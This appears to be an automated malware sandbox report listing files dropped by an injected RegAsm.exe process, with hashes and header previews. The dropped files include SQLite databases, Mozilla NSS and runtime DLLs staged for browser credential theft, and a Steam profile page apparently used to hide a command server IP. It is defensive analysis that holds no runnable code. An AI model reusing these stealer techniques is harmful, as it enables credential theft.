SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKJKJEHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAKKKJEHDBGIDHJKJDBFIIEBGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJDAFBK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIEBAKEHDHCAKEBFBKEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGCGHCG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: HFtuDDkdi6.exe, Detection: malicious, Browse Filename: A4eSWqbQPf.exe, Detection: malicious, Browse Filename: N3MZMKV5GN.exe, Detection: malicious, Browse Filename: nJGNa9kHJf.exe, Detection: malicious, Browse Filename: 7PFj8ZyNTr.exe, Detection: malicious, Browse Filename: HpsVE4Pwxn.exe, Detection: malicious, Browse Filename: u7p2rff5aP.exe, Detection: malicious, Browse Filename: w9SuIZ5zTo.exe, Detection: malicious, Browse Filename: crU0kgeotC.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: HFtuDDkdi6.exe, Detection: malicious, Browse Filename: A4eSWqbQPf.exe, Detection: malicious, Browse Filename: N3MZMKV5GN.exe, Detection: malicious, Browse Filename: nJGNa9kHJf.exe, Detection: malicious, Browse Filename: 7PFj8ZyNTr.exe, Detection: malicious, Browse Filename: HpsVE4Pwxn.exe, Detection: malicious, Browse Filename: u7p2rff5aP.exe, Detection: malicious, Browse Filename: w9SuIZ5zTo.exe, Detection: malicious, Browse Filename: crU0kgeotC.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680449169[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	5.435957174355937
Encrypted:	false
SSDEEP:	768:Qdpqm+0Iz3YAA9CWG++fcDAWZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SM:Qd8m+0Iz3YAA9CWG++FWZ4VWBCW3KI8e
MD5:	CBD86F1B7E51AFD6A287BE967271000D
SHA1:	EFFEDB68967CDDCDD5240C3C8873FA953B7C9CBF
SHA-256:	5674A8945E3F34BB724B162A002B48E5930315068E17D432BB5EF1D8154844EB
SHA-512:	1D60A5EB00C2DA8E19BDF3FCA0A2C470F457DC6EDEE098C08B853C3205C06E54F880FF1B39FD326D41F1588035E97B38BBA74186903D7524AC3A94C8F8DD3804
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: p__o https://95.217.242.142\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link hr

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3935)
Category:	downloaded
Size (bytes):	3940
Entropy (8bit):	5.819462425854772
Encrypted:	false
SSDEEP:	96:Xgfn0li5H66668lBz9Iw1+3+n5KQNxFApWsTfQfffo:XgaCH66668b/umJvTsL
MD5:	1BD5EC24503A3E68195848F600DE9C4D
SHA1:	656EEAF022E3A3824B80A226D472A16158761011
SHA-256:	3E0EFAE827AC7DDA0BBB559FC456A39DEE419535F1E9893F36D9AB8626A76130
SHA-512:	90F0C60EEEBA8C90897872B4FE362DD08EF140E15221BCDF0060729DF1E3B6B54A90BAF67A1ED641E7E667A2AFE4021BAF0D151E28E83119410F7DA37787A503
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
